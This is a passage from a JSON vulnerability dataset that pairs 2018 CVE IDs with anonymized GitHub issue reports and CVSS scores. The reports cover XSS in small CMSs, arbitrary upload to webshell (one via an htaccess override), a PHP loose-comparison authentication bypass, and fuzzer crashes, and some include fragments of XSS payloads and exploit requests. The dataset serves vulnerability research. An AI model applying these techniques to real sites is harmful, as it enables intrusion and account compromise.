  18429. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG publish an article\uff0cand you can click it. layouts APITAG layout APITAG payload\uff1a APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG save it. i think you can see the following picture to konw more. exp POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: current_tab=:tab NUMBERTAG expanded_rows NUMBERTAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG FILETAG FILETAG FILETAG payload\uff1a APITAG APITAG APITAG APITAG Affected Version NUMBERTAG",
  18430. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18431. "severity": "MEDIUM",
  18432. "baseScore": 4.8,
  18433. "impactScore": 2.7,
  18434. "exploitabilityScore": 1.7
  18435. },
  18436. {
  18437. "CVE_ID": "CVE-2018-10321",
  18438. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/5",
  18439. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/5",
  18440. "Repo_new": "philippe/frogcms",
  18441. "Issue_Created_At": "2018-04-23T10:40:30Z",
  18442. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. Hi, I have found a stored Cross Site Scripting Vulnerability. Steps to replicate NUMBERTAG log into the system with an administrator role NUMBERTAG open the page: URLTAG and click the Settings option NUMBERTAG navigate to the APITAG Site title\" section NUMBERTAG enter the payload as shown in the section below: ERRORTAG NUMBERTAG visit URLTAG and you will trigger APITAG execution. Impact: anyone who visits the target page will trigger the APITAG code, including administrators, editors, developers, and guests. Note that injecting the payload requires administrator privileges, but it then executes for every visitor. Affected Version NUMBERTAG Affected URL: URLTAG",
  18443. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18444. "severity": "MEDIUM",
  18445. "baseScore": 4.8,
  18446. "impactScore": 2.7,
  18447. "exploitabilityScore": 1.7
  18448. },
  18449. {
  18450. "CVE_ID": "CVE-2018-10329",
  18451. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/1903",
  18452. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/1903",
  18453. "Repo_new": "phpipam/phpipam",
  18454. "Issue_Created_At": "2018-04-23T07:34:27Z",
  18455. "description": "Reflected xss on phpipam NUMBERTAG URLTAG URLTAG",
  18456. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18457. "severity": "MEDIUM",
  18458. "baseScore": 6.1,
  18459. "impactScore": 2.7,
  18460. "exploitabilityScore": 2.8
  18461. },
  18462. {
  18463. "CVE_ID": "CVE-2018-10362",
  18464. "Issue_Url_old": "https://github.com/phpLiteAdmin/pla/issues/11",
  18465. "Issue_Url_new": "https://github.com/phpliteadmin/pla/issues/11",
  18466. "Repo_new": "phpliteadmin/pla",
  18467. "Issue_Created_At": "2018-04-23T04:31:51Z",
  18468. "description": "Authorization bypass in FILETAG . The APITAG function of the Authorization class uses the loose '==' comparison instead of the strict '===' comparison. Because PHP's loose comparison converts numeric-looking strings to numbers before comparing them, this can lead to a problem if the password is a number written in scientific notation: a different string with the same numeric value compares equal. E.g.: php > var_dump NUMBERTAG e2'); bool(true) php > var_dump NUMBERTAG e NUMBERTAG You should use === (strict comparison) even if this is just a problem with a small impact.",
  18469. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18470. "severity": "CRITICAL",
  18471. "baseScore": 9.8,
  18472. "impactScore": 5.9,
  18473. "exploitabilityScore": 3.9
  18474. },
  18475. {
  18476. "CVE_ID": "CVE-2018-10364",
  18477. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/332",
  18478. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/332",
  18479. "Repo_new": "bigtreecms/bigtree-cms",
  18480. "Issue_Created_At": "2018-03-31T00:24:34Z",
  18481. "description": "Cross-site scripting. A stored XSS in the user management page may lead to privilege escalation, because a payload saved by a low-privileged user executes in an administrator's browser session. Reproduction NUMBERTAG Log in as a normal user with few privileges NUMBERTAG Modify the current user's profile. Insert malicious code into either the name field or the company field. APITAG of them are vulnerable NUMBERTAG Wait until an administrator visits the user management page. APITAG APITAG BTW, may I be rewarded with a CVE id? Appreciate it in advance.",
  18482. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18483. "severity": "MEDIUM",
  18484. "baseScore": 5.4,
  18485. "impactScore": 2.7,
  18486. "exploitabilityScore": 2.3
  18487. },
  18488. {
  18489. "CVE_ID": "CVE-2018-10367",
  18490. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/135",
  18491. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/135",
  18492. "Repo_new": "wuzhicms/wuzhicms",
  18493. "Issue_Created_At": "2018-04-24T13:05:10Z",
  18494. "description": "Two Stored XSS Vulnerability. Two Stored XSS when post an article Steps to Reproduce APITAG the backstage URLTAG NUMBERTAG Go to content management, choose an existing one or post a new on to edit FILETAG APITAG are two Stored XSS, a)the first one lie in the title section b)the secone lie the the content section(you need to change to source code mode) FILETAG APITAG and we can see the page we just edit, the title is too obvious FILETAG APITAG a)title section FILETAG b)content section FILETAG",
  18495. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18496. "severity": "MEDIUM",
  18497. "baseScore": 4.8,
  18498. "impactScore": 2.7,
  18499. "exploitabilityScore": 1.7
  18500. },
  18501. {
  18502. "CVE_ID": "CVE-2018-10368",
  18503. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/136",
  18504. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/136",
  18505. "Repo_new": "wuzhicms/wuzhicms",
  18506. "Issue_Created_At": "2018-04-24T13:39:09Z",
  18507. "description": "Stored XSS Vulnerability. Stored XSS Vulnerability Found in Extension module > System Announcement Steps to Reproduce APITAG the backstage URLTAG NUMBERTAG Go to Extension Module > System Announcement > Post an new one FILETAG NUMBERTAG set to the source code mode, add the following payload to content section APITAG FILETAG APITAG and see the announcement we just posted FILETAG FILETAG Stored XSS triggered ...",
  18508. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18509. "severity": "MEDIUM",
  18510. "baseScore": 4.8,
  18511. "impactScore": 2.7,
  18512. "exploitabilityScore": 1.7
  18513. },
  18514. {
  18515. "CVE_ID": "CVE-2018-10374",
  18516. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/1",
  18517. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/1",
  18518. "Repo_new": "teameasy/easycms",
  18519. "Issue_Created_At": "2018-04-24T14:35:55Z",
  18520. "description": "Easycms has a Reflexive Cross Site Scripting Vulnerability. Download and install, on the front page, \uff08 FILETAG \uff09 All search boxes exist in XSS, payload \uff1a \"/> APITAG confirm NUMBERTAG APITAG exp: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: dwz_theme=default; UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG think_template=default; APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6 Connection: keep alive Upgrade Insecure Requests NUMBERTAG s=\"/> APITAG confirm NUMBERTAG APITAG FILETAG",
  18521. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18522. "severity": "MEDIUM",
  18523. "baseScore": 6.1,
  18524. "impactScore": 2.7,
  18525. "exploitabilityScore": 2.8
  18526. },
  18527. {
  18528. "CVE_ID": "CVE-2018-10375",
  18529. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/1",
  18530. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/1",
  18531. "Repo_new": "ky-j/dedecms",
  18532. "Issue_Created_At": "2018-04-24T03:07:39Z",
  18533. "description": "File uploading vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell.. FILETAG",
  18534. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18535. "severity": "CRITICAL",
  18536. "baseScore": 9.8,
  18537. "impactScore": 5.9,
  18538. "exploitabilityScore": 3.9
  18539. },
  18540. {
  18541. "CVE_ID": "CVE-2018-10391",
  18542. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/134",
  18543. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/134",
  18544. "Repo_new": "wuzhicms/wuzhicms",
  18545. "Issue_Created_At": "2018-04-24T07:26:21Z",
  18546. "description": "There is a cross site scripting vulnerability . > A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the email parameter post to the APITAG When the background administrator inquires about the personal information of this ordinary member, XSS triggers successfully. POC vulnerability trigger point FILETAG ERRORTAG APITAG FILETAG",
  18547. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18548. "severity": "MEDIUM",
  18549. "baseScore": 4.8,
  18550. "impactScore": 2.7,
  18551. "exploitabilityScore": 1.7
  18552. },
  18553. {
  18554. "CVE_ID": "CVE-2018-10422",
  18555. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/2",
  18556. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/2",
  18557. "Repo_new": "neeke/hongcms",
  18558. "Issue_Created_At": "2018-04-25T14:08:53Z",
  18559. "description": "Stored XSS APITAG Privilege). Stored XSS found in content field when post a site news Steps To Reproduce: APITAG the backstage: URLTAG NUMBERTAG FILETAG APITAG content field to the following payload APITAG FILETAG NUMBERTAG On the site front page, we can see the news we just posted FILETAG The Same with following FILETAG Set content field to same payload, (a lot of aaa... is for discrimination) APITAG Go to: URLTAG FILETAG",
  18560. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18561. "severity": "MEDIUM",
  18562. "baseScore": 4.8,
  18563. "impactScore": 2.7,
  18564. "exploitabilityScore": 1.7
  18565. },
  18566. {
  18567. "CVE_ID": "CVE-2018-10423",
  18568. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/18",
  18569. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/18",
  18570. "Repo_new": "bg5sbk/minicms",
  18571. "Issue_Created_At": "2018-04-23T14:46:28Z",
  18572. "description": "Information Disclosure APITAG Authentication). I found two information leakage vulnerabilities in APITAG you need to log in to the backstage first. The first one reveals the web root files on the web server (effectively a directory listing): Steps to reproduce: APITAG in to the backstage URLTAG APITAG an article APITAG the page and see FILETAG APITAG url will direct to the following... FILETAG We can see all the files located in the web root of the server. The second reveals the real path of the APITAG files (a full path disclosure via an unhandled error) Steps to reproduce APITAG in to the backstage URLTAG APITAG an article APITAG to re-edit this page; actually this page is saved as iabl NUMBERTAG dat FILETAG we can see : FILETAG APITAG burp to intercept this request, the original id is iabl NUMBERTAG and we change it to hello iabl NUMBERTAG FILETAG APITAG hello iabl NUMBERTAG does not really exist, an error occurs FILETAG This vulnerability reveals the full path of APITAG",
  18573. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
  18574. "severity": "LOW",
  18575. "baseScore": 2.7,
  18576. "impactScore": 1.4,
  18577. "exploitabilityScore": 1.2
  18578. },
  18579. {
  18580. "CVE_ID": "CVE-2018-10429",
  18581. "Issue_Url_old": "https://github.com/CosmoCMS/Cosmo/issues/405",
  18582. "Issue_Url_new": "https://github.com/cosmocms/cosmo/issues/405",
  18583. "Repo_new": "cosmocms/cosmo",
  18584. "Issue_Created_At": "2018-04-26T05:24:47Z",
  18585. "description": "There is a getshell vulnerability. Steps to Reproduce NUMBERTAG Go to FILETAG NUMBERTAG FILETAG APITAG Go to FILETAG Then the PHP code is executed FILETAG",
  18586. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18587. "severity": "CRITICAL",
  18588. "baseScore": 9.8,
  18589. "impactScore": 5.9,
  18590. "exploitabilityScore": 3.9
  18591. },
  18592. {
  18593. "CVE_ID": "CVE-2018-10430",
  18594. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/57",
  18595. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/57",
  18596. "Repo_new": "chekun/dilicms",
  18597. "Issue_Created_At": "2018-04-26T05:29:11Z",
  18598. "description": "Stored XSS Vulnerability Found in System setting > site setting. Steps to Reproduce APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the fourth textbo NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG FILETAG APITAG and see the announcement we just posted FILETAG FILETAG And then Stored XSS triggered ...",
  18599. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18600. "severity": "MEDIUM",
  18601. "baseScore": 4.8,
  18602. "impactScore": 2.7,
  18603. "exploitabilityScore": 1.7
  18604. },
  18605. {
  18606. "CVE_ID": "CVE-2018-10469",
  18607. "Issue_Url_old": "https://github.com/b3log/symphony/issues/620",
  18608. "Issue_Url_new": "https://github.com/b3log/symphony/issues/620",
  18609. "Repo_new": "b3log/symphony",
  18610. "Issue_Created_At": "2018-04-27T02:16:33Z",
  18611. "description": "Arbitrary File Upload. Hey man~I found a vulnerability: any file type can be uploaded. My test environment symphony version : latest OS : Windows NUMBERTAG Browser : APITAG Tool : APITAG Data : APITAG NUMBERTAG AM Vulnerability details Location : /upload HTTP Request: FILETAG The POST parameter named APITAG lets me change the file name, e.g. APITAG . The uploaded file is not executed (parsed) on this site APITAG , but other deployments may execute it. Attack: I can upload a jsp file directly to the website and get a webshell.",
  18612. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18613. "severity": "CRITICAL",
  18614. "baseScore": 9.8,
  18615. "impactScore": 5.9,
  18616. "exploitabilityScore": 3.9
  18617. },
  18618. {
  18619. "CVE_ID": "CVE-2018-10527",
  18620. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/2",
  18621. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/2",
  18622. "Repo_new": "teameasy/easycms",
  18623. "Issue_Created_At": "2018-04-26T16:06:48Z",
  18624. "description": "There is a Stored XSS with APITAG Stored XSS found when post an article Steps To Reproduce: APITAG the backstage: FILETAG APITAG post an article, you need to create an article classification, now we have class \"a\" FILETAG APITAG post a new article or edit an existing one FILETAG NUMBERTAG No NUMBERTAG is a simple test to check whether field is vulnerable to stored xss a)tilte filed FILETAG b)keyword field FILETAG Then go to the site front page : URLTAG c)abstract field FILETAG Then click the article to see more d)content filed FILETAG The Above four fields are prone to store xss attack",
  18625. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18626. "severity": "MEDIUM",
  18627. "baseScore": 5.4,
  18628. "impactScore": 2.7,
  18629. "exploitabilityScore": 2.3
  18630. },
  18631. {
  18632. "CVE_ID": "CVE-2018-10528",
  18633. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/144",
  18634. "Issue_Url_new": "https://github.com/libraw/libraw/issues/144",
  18635. "Repo_new": "libraw/libraw",
  18636. "Issue_Created_At": "2018-04-27T08:41:33Z",
  18637. "description": "out of bound read in APITAG The GET_PROPERTY_TABLE in NUMBERTAG f_load_property_list function get a large name_offset and value_offset, the programe will crash in parse NUMBERTAG f funtion 's APITAG name) and APITAG value) when it access a unreadable address. CODETAG Please assign a CVE ID, thank you!",
  18638. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18639. "severity": "HIGH",
  18640. "baseScore": 8.8,
  18641. "impactScore": 5.9,
  18642. "exploitabilityScore": 2.8
  18643. },
  18644. {
  18645. "CVE_ID": "CVE-2018-10536",
  18646. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/32",
  18647. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/32",
  18648. "Repo_new": "dbry/wavpack",
  18649. "Issue_Created_At": "2018-04-23T00:04:40Z",
  18650. "description": "APITAG crashes . Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash4.wav wavpack y wavpack_crash4.wav Error message: ERRORTAG Valgrind says: CODETAG ASAN says: ERRORTAG Regards, Thuan FILETAG",
  18651. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18652. "severity": "HIGH",
  18653. "baseScore": 7.8,
  18654. "impactScore": 5.9,
  18655. "exploitabilityScore": 1.8
  18656. },
  18657. {
  18658. "CVE_ID": "CVE-2018-10536",
  18659. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/31",
  18660. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/31",
  18661. "Repo_new": "dbry/wavpack",
  18662. "Issue_Created_At": "2018-04-22T23:56:28Z",
  18663. "description": "APITAG crashes Heap buffer overwrite . Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This FILETAG could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash2.wav wavpack y wavpack_crash2.wav Error message: ERRORTAG Valgrind says: CODETAG ASAN says: ERRORTAG Regards, Thuan",
  18664. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18665. "severity": "HIGH",
  18666. "baseScore": 7.8,
  18667. "impactScore": 5.9,
  18668. "exploitabilityScore": 1.8
  18669. },
  18670. {
  18671. "CVE_ID": "CVE-2018-10536",
  18672. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/30",
  18673. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/30",
  18674. "Repo_new": "dbry/wavpack",
  18675. "Issue_Created_At": "2018-04-22T23:51:48Z",
  18676. "description": "wavpack crashes many Heap buffer overwrites . Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This has many heap buffer overwrites could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash1.wav wavpack y wavpack_crash1.wav Error message: ERRORTAG Valgrind says: ERRORTAG ASAN says: ERRORTAG Regards, Thuan FILETAG",
  18677. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18678. "severity": "HIGH",
  18679. "baseScore": 7.8,
  18680. "impactScore": 5.9,
  18681. "exploitabilityScore": 1.8
  18682. },
  18683. {
  18684. "CVE_ID": "CVE-2018-10538",
  18685. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/33",
  18686. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/33",
  18687. "Repo_new": "dbry/wavpack",
  18688. "Issue_Created_At": "2018-04-23T00:08:47Z",
  18689. "description": "APITAG crashes SEGFAULT Invalid write. Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash5.wav wavpack y wavpack_crash5.wav Error message: CODETAG Valgrind says ERRORTAG ASAN says: ERRORTAG Regards, Thuan FILETAG",
  18690. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  18691. "severity": "MEDIUM",
  18692. "baseScore": 5.5,
  18693. "impactScore": 3.6,
  18694. "exploitabilityScore": 1.8
  18695. },
  18696. {
  18697. "CVE_ID": "CVE-2018-10570",
  18698. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/9",
  18699. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/9",
  18700. "Repo_new": "philippe/frogcms",
  18701. "Issue_Created_At": "2018-04-28T10:55:25Z",
  18702. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability . I discovered a storage XSS vulnerability while auditing the code Vulnerability points appear in the FILETAG file FILETAG POST passed in FILETAG EXP is as follows: FILETAG The result of EXP is as follows: FILETAG",
  18703. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18704. "severity": "MEDIUM",
  18705. "baseScore": 4.8,
  18706. "impactScore": 2.7,
  18707. "exploitabilityScore": 1.7
  18708. },
  18709. {
  18710. "CVE_ID": "CVE-2018-10571",
  18711. "Issue_Url_old": "https://github.com/openemr/openemr/issues/1518",
  18712. "Issue_Url_new": "https://github.com/openemr/openemr/issues/1518",
  18713. "Repo_new": "openemr/openemr",
  18714. "Issue_Created_At": "2018-03-22T00:13:53Z",
  18715. "description": "Security issues reported by outside group.",
  18716. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18717. "severity": "MEDIUM",
  18718. "baseScore": 6.1,
  18719. "impactScore": 2.7,
  18720. "exploitabilityScore": 2.8
  18721. },
  18722. {
  18723. "CVE_ID": "CVE-2018-10574",
  18724. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/335",
  18725. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/335",
  18726. "Repo_new": "bigtreecms/bigtree-cms",
  18727. "Issue_Created_At": "2018-04-25T04:29:16Z",
  18728. "description": "Getshell via upload function. > Tested on NUMBERTAG Platform: Ubuntu + Apache2 prerequisite In the Apache configuration, APITAG should be All for the web directories so that an htaccess file in a sub-directory can take effect. However, this is very easy to satisfy because the URL rewrite function also needs it. Rationale Since APITAG needs to ensure compatibility, it uses a blacklist to filter the extensions of uploaded files. However, while we cannot upload files ending with \"ph \", we can upload a file that changes the parsing rule: an extension blacklist does not stop configuration files that the web server itself honours. Actually, we can upload a APITAG (presumably an htaccess override, given the prerequisite above) to the server to make any file in the same directory be executed as a php file. Reproduction NUMBERTAG Preparation Prepare two files. One is a file named haozhe or whatever you want. The other one is APITAG In haozhe : APITAG In APITAG : APITAG Upload Two files On the page URLTAG , click the Browse button to upload a file. Upload these two files. It works! APITAG",
  18729. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18730. "severity": "CRITICAL",
  18731. "baseScore": 9.8,
  18732. "impactScore": 5.9,
  18733. "exploitabilityScore": 3.9
  18734. },
  18735. {
  18736. "CVE_ID": "CVE-2018-10581",
  18737. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4474",
  18738. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4474",
  18739. "Repo_new": "octopusdeploy/issues",
  18740. "Issue_Created_At": "2018-04-13T01:00:30Z",
  18741. "description": "Tenant Variables view able/update able for Environments not scoped in the associated Team when logged in User is associated with Multiple APITAG Roles. Version: Tested and replicated in Octopus version APITAG Issue: The logged in user is able to PATHTAG variable values within the Tenant Variables area for Environments that do not exist within their associated Team scoping. This occurs in situations where the logged in Users also belongs to multiple teams where one of the Teams has the APITAG permission for APITAG permissions exist for the environment. Replication Steps NUMBERTAG Create a Test Project with APITAG FILETAG NUMBERTAG Connect the associated Project to a newly generated Tenants and select two environments (i.e. Testing & Production ); FILETAG NUMBERTAG Create a Project Template within the Project; FILETAG NUMBERTAG Create a Test Octopus User NUMBERTAG Create two Teams based on the Permissions information specified below and associate the newly created User with these Teams NUMBERTAG Login to Octopus as the newly created User NUMBERTAG Navigate to Tenants > Variables NUMBERTAG In this area it's possible to PATHTAG variables belonging to environments that are not specified within the Team that has the APITAG required containing the APITAG permission NUMBERTAG The expected behavior here would be still be able to view the variable but updating/saving should not be an option; FILETAG Permissions Information: User Roles: APITAG Role Test Editor_ FILETAG APITAG Role Test Reviewer_ FILETAG Teams: APITAG Test Editor_ FILETAG APITAG Test Reviewer_ FILETAG Test Permissions Export FILETAG Source: URLTAG",
  18742. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
  18743. "severity": "MEDIUM",
  18744. "baseScore": 5.4,
  18745. "impactScore": 2.5,
  18746. "exploitabilityScore": 2.8
  18747. },
  18748. {
  18749. "CVE_ID": "CVE-2018-10677",
  18750. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/1",
  18751. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/1",
  18752. "Repo_new": "miniupnp/ngiflib",
  18753. "Issue_Created_At": "2018-05-01T17:01:24Z",
  18754. "description": "heap buffer overflow in APITAG ASAN Report: ERRORTAG Command: APITAG Test File: FILETAG Thanks",
  18755. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18756. "severity": "HIGH",
  18757. "baseScore": 8.8,
  18758. "impactScore": 5.9,
  18759. "exploitabilityScore": 2.8
  18760. },
  18761. {
  18762. "CVE_ID": "CVE-2018-10680",
  18763. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/205",
  18764. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/205",
  18765. "Repo_new": "zblogcn/zblogphp",
  18766. "Issue_Created_At": "2019-02-15T14:11:50Z",
  18767. "description": "The List of fake or duplicated security vulnerabilities we declined to accept in NUMBERTAG Still active Duplicate CVETAG Author: MENTIONTAG Detail: CVETAG Duplicated with CVETAG . We fixed them after CVETAG confirmed. See: URLTAG CVETAG Author: MENTIONTAG Detail: CVETAG As same as CVETAG and CVETAG . We decline to accept it as a valid issue. If you get the admin privilege, we have so many self xss ways. Fake CVETAG Author: MENTIONTAG Detail: URLTAG It's fake. We have no dynamic including. No one can run PHP by uploading an image in current version. By the way, it needs authentication. Updated status CVETAG Author: MENTIONTAG Detail: URLTAG We declined to accept a self xss with admin privilege. CVETAG Author: MENTIONTAG Detail: URLTAG We declined to accept a self xss with admin privilege. CVETAG Author: MENTIONTAG Detail: URLTAG It's a joke. I laughed.",
  18768. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18769. "severity": "MEDIUM",
  18770. "baseScore": 6.1,
  18771. "impactScore": 2.7,
  18772. "exploitabilityScore": 2.8
  18773. },
  18774. {
  18775. "CVE_ID": "CVE-2018-10680",
  18776. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/185",
  18777. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/185",
  18778. "Repo_new": "zblogcn/zblogphp",
  18779. "Issue_Created_At": "2018-05-02T13:22:41Z",
  18780. "description": "Z Blog php has a stored Cross Site Scripting Vulnerability. Z Blog php has a stored Cross Site Scripting Vulnerability I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a FILETAG Web site settings > Basic setting > Website title APITAG APITAG save it. exp POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: timezone NUMBERTAG username=admin; APITAG addinfotestzblogphp APITAG APITAG artshu NUMBERTAG APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG FILETAG APITAG APITAG Affected Version NUMBERTAG",
  18781. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18782. "severity": "MEDIUM",
  18783. "baseScore": 6.1,
